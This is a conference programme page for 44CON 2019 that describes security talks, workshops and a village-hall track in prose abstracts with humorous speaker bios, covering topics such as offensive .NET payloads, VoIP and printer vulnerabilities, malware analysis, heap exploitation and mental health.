44CON Village Hall Track

The village hall is a new space we’re using to run a semi-unconference track. This is a space for community sponsors, regular sponsors, backup speakers and other people we invite to run workshops, activities and other sessions outside of the CFP process. Think of it as a vendor hall track without the infosuck, and sometimes without the vendors too. This section will be updated as activities are added.

44CON Mental Health Village

The Mental Health Hackers are running a Mental Health Village, which will feature various talks and activities. The following talks are being run within the Mental Health Village. J. Wolfgang Goerlich’s talk is a Mental Health Village talk, but is currently scheduled for Track 2, so is not shown here.

4G to 5G – Cellular Security Myths and the Reality

To date cellular technology has been about delivering a small number of services to end users. The advent of 5G will introduce not only new end user services but consist of a number of new paradigms that mobile operators will have to implement. With the reduction in cost of software defined radios and freely available mobile technology stacks the barrier to entry into mobile technology hacking has never been lower. That said, there are still a number of myths and misconceptions with regards to mobile security and this will only get worse an additional end user services are released.

During this presentation we will walk through a number of key topics including 4G security, IMSI catchers, 5G services 5G security and the adversaries that an end user can face.

Please note, this talk will not be filmed.

Matt Summers, AON

Matt didn’t submit a bio, but being half-man, half-machine we didn’t expect him to. Sent back from the future to protect John Connor from an army of advanced shape-shifting cyborgs, Matt decided the best way to fulfil his mission was to get involved in founding BSides London. After this, he fought a T-1000 unit in a steel mill, and a shape shifting Terminatrix as he tried to stop judgement day. Lately, Matt has been exploring the world of 5G, and the insides of several cybernetic infiltration units.

BYOI (Bring Your Own Interpreter) payloads: Fusing the powah of .NET with a scripting language of your choosing

Offensive PowerShell tradecraft is in “Zombie Mode”: it’s sorta dead, but not entirely. With all of the defenses Microsoft has implemented in the PowerShell runtime over the past few years Red Teamers / Pentesters & APT groups have started too shy away from using PowerShell based payloads/delivery mechanisms and migrate over to C#. However, C# is a compiled language, operationally this has a few major downsides: we can’t be as “flexible”, setting up a proper development environment has overhead and can be time consuming, you have to compile all the things all the time etc.. Bottom line is I’m lazy and creating your malwarez/custom payloads in C# is not as easy & straight forward as it would be in PowerShell or really any scripting language.

This raises the following quandary: can we somehow get our own scripting language interpreter on the target machine while still remaining opsec safe and use it to perform all of our post-exploitation activities?

Turns out by harnessing the sheer craziness of the .NET framework, you can embed entire interpreters inside of .NET languages allowing you to natively execute scripts written in third-party languages (like Python) on windows! Not only does this allow you to dynamically access all of the .NET API from a scripting language of your choosing, but it also allows you to still remain completely in memory and has a number of advantages over traditional C# payloads! Essentially, BYOI payloads allow you to have all the “power” of PowerShell, without going through PowerShell in anyway!

In this talk we will be covering some key .NET framework concepts in order to understand why this is possible, how to actually do the interpreter/engine/runtime embedding, the concept (that I coined) “engine inception”, differences between traditional C# payloads & BYOI payloads, demoing some examples of BYOI payloads and finally SILENTTRINITY: an open-source C2 framework that I’ve written that attempts to weaponize some of the BYOI concepts.

Marcello Salvati, BlackHills Information Security

“Marcello Salvati (@byt3bl33d3r) is a Security Analyst at BlackHills Information Security by day and by night a tool developer who discovered a novel technique to turn tea, sushi, alcohol and dank memes into somewhat functioning code. His passions include anything Active Directory related, trolling people on GitHub and developing open-source tools for the security community at large which he’s been doing for the past several years, some of his projects include SilentTrinity, CrackMapExec, DeathStar, RedBaron and many more.

He’s also really good at writing bios. I know, at this point you’re probably asking yourself: ” Wait, how good of a bio writer is this guy? I need a quantifiable metric in order to come to a conclusion! The suspense is killing me!”. Well John Strand hired him so that he could continue to write them. Yeah… that’s how good. Checkmate Atheists! *dab* *mic drop*”

Cold War Cryptography

The use of cryptography during the Cold War is a fascinating, yet still little researched topic. Though most is still classified, a considerable amount of information about Cold War encryption has become public over the last two decades. The purpose of this talk is to tell the five or six most stunning crypto stories from the Cold War era in an entertaining, yet informative way. Like always, the speaker will use Lego models, self-drawn cartoons and similar means to support his speech.

Klaus Schmeh

Klaus Schmeh has published 16 books, 200 articles, 1,000 blog posts and 25 research papers about encryption technology, which makes him the most-published cryptology author in the world. While he writes his blog in English, most other of his publications are in German. Klaus Schmeh is the world’s leading blogger in the field of crypto history (www.schmeh.org).

As his main profession of security consultant at the German company, cryptovision, Klaus utilizes his special skill in explaining complex technical topics, often using self-drawn cartoons and Lego brick models for visualization. As an award-winning member of the public speaking club, Toastmasters, he is an excellent speaker and frequent lecturer. He has hosted presentations at more than 200 conferences in Europe, Asia, and the USA. His presentations at 44CON, RSA Conference, TrusTech, NSA Crypto History Symposium, HistoCrypt, Charlotte International Cryptologic Symposium and other major events were enthusiastically received because of their clarity and because of Klaus’ engaging presentation style.

Dial V for Vulnerable: Attacking VoIP Phones

More and more everyday objects become “smart” and get connected to the internet. VoIP phones are among the oldest class of smart devices. Despite new phones being constantly released, most of these devices contain cheap hardware components and badly programmed software. Their state of security is often questionable, or worse. We show that most phones suffer from serious security flaws that allow attackers to gain full control of these devices. Such hijacked devices not only allow the attacker to eavesdrop on all communication, but can serve as an entry point for further attacks to the internal networks they are connected to.

VoIP phones can be found on each enterprise desk, in critical infrastructure buildings, at home and other places where phone communication is required. Therefore, security flaws on such a device can have far-reaching consequences, especially when transmitting sensitive or private information. We present critical vulnerabilities and various classes of security flaws that allow an attacker to fully compromise the respective device. We were able to cause a denial of service, to eavesdrop on conversations, and to gain remote code execution on the phone.

In our investigation, we focused on the web-based user interface that most phones provide for configuration and management purposes. We present different test setups for analyzing the software running on those phones, including emulation and live debugging. Furthermore, we reveal strategies and tools for finding these flaws.

To complete the presentation, we compare our manually detected vulnerabilities to results of different automated firmware security analysis systems. As we show, automated scanners are unable to find most of these vulnerabilities and leave systems widely unprotected.

Philipp Roskosch

Philipp is a security researcher of the department Secure Software Engineering at Fraunhofer SIT (Germany). His research interests center on static and dynamic security analysis in the area of mobile apps and IoT devices. Besides research, he is a penetration tester in the same field. In his spare time, he enjoys hacking as a member of TeamSIK.

Stephan Huber

Stephan is a security researcher at the Testlab mobile security group at the Fraunhofer Institute for Secure Information Technology (SIT).
His main focus is Android application security testing and developing new static and dynamic analysis techniques for app security evaluation. He found different vulnerabilities in well-known Android applications and the AOSP. He gave talks on conferences like DEF CON, HITB, AppSec or VirusBulletin. In his spare time he enjoys teaching students in Android hacking.

EternalGlue – Rewriting NotPetya for corporate use

NCC Group had a large corporate client that was interested in how their production network would be impacted if they had been hit by the NotPetya worm. Cedric and Aaron ended up reverse engineering NotPetya and building a custom
version with all the ransomware/destructive capabilities pulled out, and plugged it inside new logic to limit how it spreads. This allowed client-defined parameters to dictate where it could propagate and also allowed infections to transmit telemetry information back to a central server to allow visibility into how and where it spread.

After providing the client with the tool they went through a three-phase approach of ensuring that the simulated worm actually behaved as expected, with the final phase being them running it within their corporate production
environment. This allowed them to observe how the real threat would’ve spread, highlighted some important mitigations already in place, as well as highlighting areas of their network they didn’t anticipate to be affected, etc.

Cedric and Aaron will discuss the work involved in reverse engineering NotPetya, the logic introduced to ensure safe and controlled propagation, some of the technical hurdles encountered, basic AV bypassing required, the lab environment used for testing, etc. James will discuss his experience from the client’s perspective and what was involved in convincing such a large organization to get on board with running such a tool in a production environment.

This opens up a new phase of development and tooling opportunity for the defense industry. It allows us to much more closely mimic realworld scenarios in a controlled fashion and allows different and arguably more realistic visibility into the effects of such realworld attacks, versus more traditional consulting approaches.

Please note, this talk will not be filmed.

Aaron Adams, NCC Group

Aaron works in NCC Group’s Exploit Development Group. He has been doing reverse engineering / exploit development / code review for 15+ years. For some reason he is particularly fond of heaps.

Cedric Halbronn, NCC Group

Cedric (@saidelike) has joined NCC Group in 2015 and has been doing reverse engineering / exploit development for 10+ years. His current interests are memory corruption bugs in the Windows kernel, HP iLO, mobile devices, embedded devices, etc.

James Fisher

James for the last 6 years has been responsible for defending a large global network against technically minded adversaries; prior to this he spent 11 years as a senior penetration tester, 6 of which as a CHECK team leader.

Hunting for bugs, catching dragons

While browser and plugin exploits are frequent, it’s less common to see exploits affecting targets without scripting capabilities. Are these worth attacking? How do we proceed? How do we identify valid entry points and bugs? This talk will cover some research done at Microsoft on Outlook and Exchange and discuss the results. Scary dragons will be spotted in this tour, hopefully you’ll catch some too.

Nicolas Joly

Nicolas Joly is a security engineer at the MSRC in Cheltenham. He has more than 10 years of experience at reverse engineering and vulnerability discovery, and is now focused on finding and exploiting bugs at Microsoft. Prior to this, he used to hunt bugs for bounties and won several times pwn2own with Vupen Security.

I’m unique, just like you: Human side-channels and their implications for security and privacy

Almost everything about us – our handwriting, DNA, faces, voices, fingerprints, even our eyes – can be used to distinguish us from the seven billion other people on the planet. These physical identifiers can allow law enforcement to trace back real-world crimes to offenders, and enable biometric authentication mechanisms. However, such identifiers are often irrelevant when it comes to attempting to track or disrupt threat actors.

In this talk, I will discuss, explore, and explain identifiers which are unintentional, non-physical, and generated as a result of human behaviours and activities, but which can still be used to uniquely identify and/or track individual users in the digital realm. I call these identifiers “human side-channels”, and will explore how they work; how they can be used for both attack and defence; and how they can be countered.

I’ll examine three human side-channels in particular: forensic linguistics; behavioural signatures; and cultural references. I will start by exploring the theories underpinning these side-channels, which are rooted in personality psychology and the concepts of consistency and distinctiveness as a result of our unique experiences, training, and feedback. I’ll then explore how they work; walk through case studies and examples/demos of using them practically in security contexts; and discuss how they could be practically applied to investigate and track threat actors, in situations ranging from hostile social media profiles to post-compromise exfiltration and privilege escalation.

I’ll also examine the privacy implications of each technique, and how such characteristics – which are much harder to recognise, obfuscate, or spoof – could be used to erode privacy. I’ll go into detail regarding possible countermeasures to disguise your own human side-channels, and I’ll wrap up by outlining some ideas for future research in these areas.

Matt Wixey, PWC

Matt is the Research Lead for the PwC Cyber Security practice in the UK, and is a PhD candidate at University College London. Prior to joining PwC, Matt led a technical R&D team for a law enforcement agency in the UK. His research interests include antivirus and sandboxing technologies, unconventional attack vectors, side-channels, and radio security.

Making something out of something – adventures in bringing electronics to the dark side

This talk relates to software and hardware modification of existing consumer electronics in order to give them features that could be relevant in a security context. It mainly focuses on techniques for identifying the potential for a device to be modified, and techniques for doing so, with a large number of varying demos to back it up.

The first device modification will be the NX301 handheld ODB-II reader. This device in particular was chosen due to its locked chip, encrypted firmware updates and the board’s capabilities, in particular the STM32 MCU, which could be used for connection to various peripherals. The talk will then outline the current features, and the features that could be potentially added to it. The most key of these will be discussing how, due to the STM32 chip used on the board, it would be possible to turn this device into a handheld USB rubber ducky, with an LCD screen menu and interface. This will then discuss how the device was selected for reverse engineering among a large number of potential devices.

The talk will then move onto another device, the WS-6933 satlink detector. This device was found to have a similar Microcontroller to the previous device, however it has some limitations which meant that it could not be used for the same purpose, but could be used for its own. Various modification techniques will be discussed in depth.

These techniques will be performed on a third device, a 2.4GHz RF modular used by radio controlled planes. This device was briefly touched upon in my talk last year “Pwning the 44CON Nerf Tank”, but in this instance will be used in order to show how USB access can be provided to all four radio chipsets on the device, providing a powerful interface for interacting with their specific protocols. This will cover more details of debugging in environments where it is not always possible. This will be briefly touched upon as similar work has been covered in other talks, but can demonstrate useful techniques.

A children’s toy will then be demonstrated with custom firmware to perform different functions to what was intended. This will outline the disassembly and analysis of the device, and point out how large amounts of the technology involved in creating a smart children’s toy are the same as in a more serious piece of equipment, and also outline the same vulnerabilities. This section of the talk will largely be for entertainment value, but will show how anything can be converted into a useful device with a sufficient amount of knowledge and effort.

The last demo will be of what can be done when hardware changes are made to devices. We will demonstrate how, by adding a few additional components and a tuned coil to the back of the OBD-II reader, the device can be modified in order to perform the functions of an NFC device, specifically a Mifare Classic NFC tag, with all of the features necessary to emulate and exploit the device. This will show how desirable modifications can be made to the hardware on the device in order to increase it’s capabilities, and demos with some NFC exploits will accompany this.

Chris Wade, Pen Test Partners

Chris is a seasoned security researcher and consultant. His main focuses are in reverse engineering hardware, fingerprinting USB vulnerabilities and playing with Software Defined Radios, with his key strength lying in firmware analysis, which he utilises as part of the hardware testing team at Pen Test Partners.

The security of common enterprise infrastructure devices such as desktops and laptops has advanced over the years through incremental improvements in operating system and endpoint security. However, security controls for network devices such as enterprise printers are often ignored and thus present a greater potential for exploitation and compromise by threat actors seeking to gain a persistent foothold on target organisations.

In order to assess the current state of mainstream enterprise printer product security and to challenge common assumptions made about the security of these devices, which sit on key parts of enterprise networks and process sensitive data, we set out on a vulnerability and exploitation research project of six known vendors. We were able to find remote vulnerabilities in all printers tested through various attack vectors, revealing a large number of 0-day vulnerabilities in the process.

In this talk we walk through the entire research engagement, from initial phases such as threat modelling to understand printer attack surfaces to the development of attack methodologies and fuzzing tools used to target printer-specific protocols and functions. Besides of remarking important vulnerabilities found and their respective CVE’s, proof of concept exploits showing how it is possible to gain full control of printers and all of the data they manage will be presented. This will show how to use enterprise printers as a method of persistence on a network, perhaps to exfiltrate sensitive data or support C2 persistence on Red Team engagements.

We also address a number of challenges that researchers can face when performing vulnerability research on devices such as printers and how we used different techniques to overcome these challenges, working with limited to no debugging and triage capabilities. We also present mitigations that printer manufacturers can implement in order to reduce printer attack surfaces and render exploitation more difficult.

Daniel Romero, Managing Security Consultant, NCC Group

Daniel is currently a security consultant and researcher at NCC Group. During his career he has worked in interesting security projects, always trying to “break” as much as possible. In the last years Daniel has mostly been focused on embedded devices / IoT and all what surrounds it such as hardware, code review, reverse engineering, fuzzing or exploiting.

Mario Rivas, Senior Security Consultant, NCC Group

Mario is a penetration tester and security consultant at NCC Group in Madrid. His interests revolve around all areas of computer security, always trying to learn new things, and specially enjoying writing tools during the process to make his life a bit easier.

One Person Army – Playbook on how to be the first Security Engineer at a company

How often have you heard that ‘Early stage startups don’t care much about Security because if there is no product, there is nothing to secure?’ Although there is merit in the argument that startups need to build product so as to sustain and grow, it often puts the person in charge of securing them in a tricky position. For most startups, this person is the first Security Engineer who can be somewhere between the 10th to 300th employee. By the time the first Security Engineer is on-boarded the attack surface has usually become quite large and he or she faces an uphill battle to go about securing the organization. In such cases, the Security Engineer needs to perform as a ‘one-man army’ keeping the attackers at bay. In this talk, i will present a playbook on how to perform as one.

In this presentation, i will talk about the Startup Security methodology which has served me very well in starting, building and growing Security teams at various startups. The focus and goals include :-

I will also recount war stories from experiences including mine from when I was the first AppSec Engineer at Duo Security (acquired by Cisco), was founding engineer at Elevate Security and started the Security team at MileIQ (acquired by Microsoft) and those of my colleagues who have been in similar shoes.

Kashish Mittal, MileIQ

Kashish Mittal is a Security Researcher and Engineer. He currently is the Head of Security at MileIQ, a Microsoft startup. He has worked for companies such as Elevate Security, Duo Security, Bank of America, Deutsche Bank etc. By choice, he is an ethical hacker and an addicted CTF player. He is a member of PPP (CMU’s elite CTF group). Prior to joining Duo, he did Security Research at Cylab, Pittsburgh. He has a BS and a MS from Carnegie Mellon University with a focus on Security. He is passionate about delivering Security awareness and training for employees, college students and high schoolers etc. He has been invited to presented his research and work at various national and International Security conferences.

Outsourcing global cyber norms? The case for a multilateral collaboration model for the development and enforcement of rules for responsible behaviour in cyberspace

Traditional mechanisms of international rule-making have failed to drive forward globally accepted norms of responsible behaviour in cyberspace. The private-sector led initiatives that have sprung up in their place thus far fail to consider how threats to state powers and control will be contained. The only way to break that current impasse is by way of new ways of working.

The presentation will make the case for a model of multilateral collaboration, de facto outsourcing responsibility for international cyber norms development to a differently incentivised private sector while ensuring states maintain responsibility for norms enforcement.

It will test the assumption that a model of this kind has not yet been successfully applied, assessing three recent cyber norms initiatives – Cybersecurity Tech Accord; Charter of Trust; Paris Call for Trust and Security in Cyberspace – against five factors before drawing practically focused conclusions, looking at the success factors for adoption of the proposed multilateral collaboration model, and setting out how business and government practices would have to change.

Katharina Sommer, Head of Public Affairs, NCC Group

Seeking to act as an interpreter between technical and policy communities, Kat leads the Group’s political engagement, government relations and lobbying work, educating policy-makers on cyber security and internal audiences on political developments and priorities, and shaping the business’s operating environment. She is also training as a technical security consultant, working through the Group’s graduate programme at her own pace.

Kat has an international understanding having studied in Germany and the Netherlands, worked in Argentina, Brussels and Strasbourg before settling in the UK just over ten years ago. She takes a keen interest in the way the public and private sectors collaborate to improve cyber resilience, and is currently working on a campaign to make the UK’s Computer Misuse Act for the 21st century. She is equally passionate about the global trends that inform how governments and businesses respond to cyber security challenges in an ever evolving interconnected world. In the last year, Kat has looked at emerging trends in multi-level cyber diplomacy, and challenged the future agenda of the World Economic Forum’s Global Centre for Cybersecurity.

And with a third degree black belt in Tae Kwon Do, Kat is not just a cyber ninja…

Security Research Teams – How to manage, grow and retain them

Security research teams are one of the important partners in any security organization and are usually found through an external company or through an internal group. Such teams are needed to secure your products, your network, and your business resources.

Managing and measuring such intangibles as “Security research” is a difficult problem, mainly revolving around the need to discover and fix issues before they reach the field and cause actual harm. Measuring or defining KPI for such teams is problematic as research has no firm boundaries or guarantees.

Access to such talent is crucial in today’s world and many companies are looking into hiring and growing such internal teams. Hiring security research talent, retaining and helping them to provide high business ROI is very difficult.

Over my career, I helped build and grow security research teams in large corporates and in start-up environments, and I will share some of my experience and advice for managing such teams.

In this talk, I will cover some basic lay of the land, some KPI that can be used to measure success and advice on how to retain and guide such teams.

Spyware, Ransomware and Worms. How to prevent the next SAP tragedy

Is not a secret that SAP is a market leader and one of the principal software providers of the core business applications around the world, nearly 95% of the Fortune-500 companies heavy rely on SAP to perform their most critical and daily operations such as processing payroll, benefits, storing sensitive customers’ information, handling credit cards, logistics and many more.

Due to the “ERP Complexity of the simple things” and in combination with several proprietary protocols, entry-points and default misconfigurations, ERPs are particularly vulnerable to Spyware, Ransomware and Worms, making them the ideal targets for this type of attacks due to the economic significance that these systems hold.

Join me on this completely new and highly technical talk, in which I’m going to explain through several live demos how the different types of malware could impact SAP and what actions you could take to prevent the next SAP tragedy.

As an added value, we will reveal for the first time, our very own project “ARSAP”, a semi-automatic mechanism that detects and register all the SAP systems that are exposed to the Internet, extracting the system’s metadata and cataloging the assets in base of their Geo-location, system type, version, installed components, etc.

Jordan Santarsieri, Vicxer

Mr Santarsieri is a founder partner at Vicxer where he utilizes his 12+ years of experience in the security industry, to bring top notch research into the ERP (SAP / Oracle) world.

He is engaged in a daily effort to identify, analyze, exploit and mitigate vulnerabilities affecting ERP systems and business-critical applications, helping Vicxer’s customers (Global Fortune-500 companies and defense contractors) to stay one step ahead of cyber-threats.

Jordan has also discovered critical vulnerabilities in Oracle and SAP software, and is a frequent speaker at international security conferences such as Black-Hat, Insomnihack, YSTS, Auscert, Sec-T, Rootcon, NanoSec, Hacker Halted, OWASP US, 8dot8, DragonJAR and Ekoparty.

Throw Open The Gates: Trading Control for Visibility

As many enterprises shift to a cloud first business model, asset visibility can become increasingly difficult for security. Cumbersome gated approval processes, a security mainstay for years, are now quickly bypassed in the name of developer agility and growth. Security practitioners need new approaches that move at the pace of this new DevOps driven world.

In this session, we will tell the story of a simple premise: can we discard a cumbersome approval process, throw open the gates, and build visibility for security by offering free “backdoored” server resources to developers. We’ll share the context that lead to our premise, the tooling we built to facilitate the experiment, our success criteria, 3 years of practical experience running the program, and lessons learned.

Kyle Tobener, SalesForce

Kyle Tobener is a Director of Enterprise Security at Salesforce. He began his professional career as a zoologist but fled the jungle to return to San Francisco and focus on tech. His specialty now is application security, with a side dish of 3rd party vetting and contract negotiation. In his free time he collects cyberpunk paintings, runs the largest board game Meetup in San Francisco, and teaches his daughter to break things.

Alessandro Lapucci

Alessandro is a Lead Software/Security Engineer with Security Compliance at Salesforce, where he develops internal automation tools and customer facing web applications. Born and raised in Italy, he lived in Ireland and California before recently moving to Switzerland. When he isn’t glued to a computer screen, he spends time playing vinyl records and learning to fly racing quadcopters.

The billion dollar IoT attack no one knows about

What would you do if you knew you could exploit 20 million plus IoT devices? Denial of service? Old hat. Power grid manipulation? Boring! What about making a billion dollars? Many IoT tracking devices now use cellular data networks to communicate with servers allowing owners to track and interact in near real time with their devices. Which is great, but is that opening another avenue for attack?

Sometimes it feels we are going backwards in IoT security, along with the obvious wireless attacks, the rooting of the latest must have sex toy and the very public exposure of undocumented services on Shodan, we have seen countless compromises being performed by simple logic flaws. Insecure Direct Object References (IDOR) is commonly used in attacks that look to compromise the web service to take over the end user account. It is most often found in the rush to deliver new devices, usually from the companies playing catch up with their outsourced development team. These logic flaws allow the attacker to perform functions as the user, such as remotely unlocking, starting and stealing your car or tracking your kids in real time. Great, so money made, move on right? Well, there are many problems with stealing a car or kidnapping a child for ransom, not least you might easily get arrested and moving stolen goods especially high value stolen goods is harder than you think and let’s be honest a kidnapping and ransom is not a good look for anyone. But are we missing a trick?

In this talk we will look at connected tracking devices and show examples of how simple logic flaws are being repeated time and time again across multiple devices. We will show how manufacturers and developers are white labelling vulnerable APIs for and selling them on to multiple tracking device companies magnifying the issue millions of times to unsuspecting victims around the world.

However, where IDOR is well known, what is not is a new technique of abusing these logic flaws for financial gain, so far unused by malicious hackers, it can easily be used to turn 20 million tracking devices in to nearly a billion dollars, all without the manufacturers and possibly the owners knowing anything about it. We will show how trivial it is to exploit and how the attack can be instigated worldwide in seconds to immediately start making money and show how the attack can be repeated time and time again with little or no repercussions.

Tony Gee, Pen Test Partners

Tony has over 14 years of security experience, he has worked both as an internal blue team consultant within the finance industry and for the technology partner for the world leading Oyster card system and more latterly as an external security tester and auditor.

Tony speaks the world over at technology events highlighting key risks with the internet of things, automotive and maritime, med tech and key payment systems.

Vangelis Stykas, Pen Test Partners

Vangelis Stykas is a backend engineer turned into a pentester. Playing around with bits and bytes for the past 30 years , he has hacked ships,cars and locks. He has a weak spot for breaking APIs and web stuff but hates building them.

As OS protection mechanisms become more and more sophisticated, most APT actors have moved away from traditional rootkits. Turla (aka Snake), one of the oldest espionage groups known for major breaches including the US military, is a perfect example. Turla developers started developing complex userland malware such as a backdoor targeting Microsoft Outlook. This allows them to blend into normal network traffic, bypassing network security solutions almost as efficiently as the rootkit they used in the past. However, the Turla toolbox contains an undocumented and even more ingenious userland rootkit: LightNeuron.

LightNeuron specifically targets Microsoft Exchange email servers, one of the most critical assets in an organization. It provides almost full control over Microsoft Exchange with the ability to read, compose and send, and block emails. It has very flexible rules allowing its operators to spy on and to modify email content of specific people in compromised organizations. Additionally, it includes remote-control functionality entirely directed via inbound emails with commands hidden in PDF documents or JPG images thanks to a custom steganography technique. We also believe that a Linux variant, with the same capabilities, exists in the wild.

LightNeuron uses a previously unseen persistence technique: a Microsoft Exchange Transport Agent. In the Exchange architecture, Transport Agents operate at the same level as security products such as spam filters. Thus, LightNeuron’s C&C communications and data exfiltration cannot be detected by such products.

LightNeuron was used in recent attacks against diplomatic organizations in Eastern Europe and the Middle East, but we have evidence that Turla started using it in 2014.

This talk will provide a detailed analysis of LightNeuron and of this new persistence technique. We will also present a demo showing LightNeuron in action and discuss detection and remediation techniques.

This talk has been sadly cancelled due to travel issues.

Matthieu Faou, ESET

Matthieu Faou is a malware researcher at ESET where he specializes in targeted attacks. His main duties include threat hunting and reverse engineering of APTs. He finished his Master’s degree in computer science at École Polytechnique de Montréal and at École des Mines de Nancy in 2016. In the past, he has spoken at multiple conferences including BlueHat, RECON, Virus Bulletin, or Botconf.

Despite my best efforts in 2011, IBM/Trusteeer Rapport is still doing the rounds in the UK banking community. Having concentrated on what was at that time OS-X related issues with only hints at the Windows issues, no one seemed to pick up the mantle to prove the remainder of Trusteer Rapport nothing more than snake oil. In the intervening years Trusteer have been hard at work improving their backdoors after their acquisition by IBM for a cool $1 billion in September 2013, quite the price to pay indeed. In this talk I’ll cover the historical state of, what was, the MacOS implementation since a recent disclosure resulted in IBM/Trusteer fixing the issues by performing a simple ‘rm -rf’ of the Kernel components (CVE-2018-1985) and the current state of play for the Windows components, the result of which is hopefully the ‘rm -rf’ of the Windows components.

Neil Kettle, Digit Labs

Neil was testing various writing products when he found a pair of special sunglasses. Wearing them, he saw the world as it really is: people being bombarded by media and government with messages like “Stay Asleep”, “No Imagination”, “Nobody got fired for buying IBM”. Even scarier is that he is able to see that some usually normal-looking people are in fact ugly aliens in charge of the massive campaign to keep Trusteer Rapport installed. At the very first 44CON he came to chew bubble gum and kick ass. In 2019 he’s back… And he’s all out of bubble gum.

Rebalance Every 10,000 Kilometers

Careers are long. Jobs are short. One day, things are going well and in balance. The next day, there’s twenty hours of work to do. Pull back some and it is more of the same. The first half of the year, things were great. Then change came and chaos reigned and burn out followed. Pull back even further, and the demands of work and life over decades comes into sharp relief. This session presents strategies to maintain your mental health over the long haul. Handle imposter syndrome and stress. Know when to stick it out but recognize the signs when it is just not worth it. Fail and recover gracefully. Pulling on personal lessons and anecdotes from mentoring others, the presentation provides a career user manual.

J. Wolfgang Goerlich

J. Wolfgang Goerlich is an Advisory CISO with Duo Security. Prior to this role, he led IT and IT security in the healthcare and financial services verticals. Wolfgang has held VP positions at several consulting firms, leading advisory and assessment practices. Wolfgang regularly presents on the topics of security architecture and design, identity and access management, data governance, secure development life cycles, zero-trust security, and more.

The CISO’s Dilemma

Defending an enterprise is a balancing act. I have worked as an offensive testing vendor to several global organisations over 18 years. This talk explores the challenges that today’s CISOs face – the threat landscape, overall shortage of infosec expertise, the ever evaporating shelf life of infosec products and an increased burden of compliance requirements. I will share my experiences from working with highly effective CISOs and internal infosec teams and what it takes to function on the razor’s edge.

Saumil Shah

Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients around the globe. Saumil is an internationally recognized speaker and instructor, having regularly presented at awesome conferences like Deepsec, Blackhat, RSA, CanSecWest, PacSec, EUSecWest, Hack.lu, Hack-in-the-box and others. He has authored two books titled “Web Hacking: Attacks and Defense” and “The Anti-Virus Book”.

Saumil graduated with an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time breaking software, flying kites, traveling around the world and taking pictures.

44CON 2019 Workshops

All workshops are two hours long unless otherwise specified. Some of these workshops require you to bring items to get the most out of them. All workshops are being filmed, although one will only contain slides and audio footage.

Car Hacking Village – CAN bus basics with hands on fuzzing

The ‘Car Hacking Village’ has PD0 a ‘CAR in a box’ which is most of the ECU components from a Peugeot 208. This is configured so that all the main dials on the vehicle work, Speedo, rev counter, fuel gauge and temp gauge. This will allow attendees if they get through the fuzzing part access to a complete vehicle to hack.

The workshop will consist of a short presentation on the history of CAN bus, the physical layer, the speeds, data format, message id’s. The attendees will then have access to sets of instrument cluster (hopefully 10-12 sets) to fuzz to try to work out which messages cause which parts of the cluster to work. Each cluster set will include a can bus adapter that can be used for the fuzzing.

Ian Tabor

Network / security architect that has a passion for car hacking, found vulnerabilities in his own car and also private Car bug bounties. Now runs Car Hacking Village UK and is part of the team behind CHV at defcon

Introduction to GLIBC heap exploitation

A 2-hour workshop introducing folks to the basics of GLIBC heap exploitation, covering two publicly known but oft-misunderstood GLIBC heap exploit methods. VMs will be provided with the workshop, and the “House of force” and “fastbin dup” techniques will be covered in depth.

Students will learn two heap exploitation techniques whilst writing exploits against two vulnerable binaries. It is aimed at those will little to no GLIBC heap experience. A lot of people who CTF are keen on learning about heap exploitation since there are always heap-based challenges and each year new techniques are brought to light. What stops them from learning these techniques is the misconception that heap exploits are prohibitively difficult to write, my workshop is there to dispel this myth and provide a starting point for those who wish to start learning new exploit development techniques.

Max Kamper, Applied Intelligence Laboratories

An ex-Royal Marines Commando turned cyber-security enthusiast. Max cut his teeth on electronic warfare operations and now works as a researcher for Applied Intelligence Laboratories. Author of the “ROP Emporium”, he spends his time compiling the GNU C library and wondering how those MOVAPS instructions got into that one version on Ubuntu.

Logging Made Easy

Logging Made Easy (LME) is a tried and tested self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks. LME is designed to be a quick to deploy logging solution giving you access to useful logs when you need them. Lead by NCSC, Developed in collaboration with NCC Group and with funding from the Cabinet Office, LME provides an organisation with a simple to deploy, simple to maintain and simple to use logging solution. LME allows for users with both limited knowledge and the with advanced knowledge to perform performance, Incident response and threat hunting activity. LME gathers logs to provide this capability both from the built in windows event logging and that provided by Microsoft Sysmon.

This log data can be leveraged to search for to name but a few, Files hashes, File Names, nefarious launches such as Microsoft win word launching Microsoft Powershell which then launches IE to download and execute VBS. On the other end of the attack spectrum LME allows you to see what applications are crashing on your estate and other performance related logs, Allowing you to be one step ahead of some potential problems.

We will run through this tutorial and then provide you with an environment to give it a go yourself (with a bit of magic for the Windows slow bits)

A hands on look into the logging made easy solution from set-up, roll-out, testing and example uses. This workshop will aim to show attendees how to deploy and use LME over a provided test network. Featuring hands on practicals and scenarios to test out functionality in LME and get a grasp on how this data can be leveraged to achieve greater visibility into actions occurring on your hosts across your estate.

Duncan Atkin, NCC Group

Duncan is a fully certified lumberjack, capable of processing massive volumes of logs. When not processing logs, he enjoys growing trees and making cider with the fruits of his labour.

(Duncan did not submit a bio)

NCSC Representatives

NCSC Representatives are not permitted to submit bios, and while funny to make one up, it would be cruel for us to do so, so we’re leaving this blank.

RFID Hacking Tools Workshop

A 101 & upwards workshop on Radio Frequency Identification, tools, and how to make your own access control system.
If you’re new to Arduino, RFID or basic electronics, this is the workshop for you!

To start of an intro into RFID theory and how this is practically applied with the use of tools on the market such as Proxmark RDV 4.

We will be covering some basics of electronics, and with breadboards, teach you how to put your own circuit together, this will come in handy when we use these basics to help you build your own MFRC522 reader setup.
We will explore the Arduino MFRC522 library, working our way through the scripts and learn how they can be adapted and built upon to bring everything together building your very own access control system.

There is no registration but you will need one of these kits. We will have some available from the front desk, and Chrissy has some available to borrow for those that can’t afford the kits.

Please note, this workshop will not be filmed.

Chrissy Morgan

Chrissy heads up the IT Security Operations for a Close Protection (Bodyguard) company by day and is a Security Researcher by night.

As an advocate of practical learning, Chrissy also takes part in bug bounty programs and has found bugs in platforms such as Microsoft and Whois.com. She has carried out research in the areas of Steganography, RFID, Physical Cyber Systems Security and is actively involved within the information security community across a wealth of subjects.

44CON 2019 Village Hall

The Village hall has a mix of vendor, community and general activities. We’ve usually had a hidden track, and this year we’re putting it in the main hall, which means it’s not really hidden. All activities will be filmed unless otherwise specified.

Owning The Cloud Through SSRF

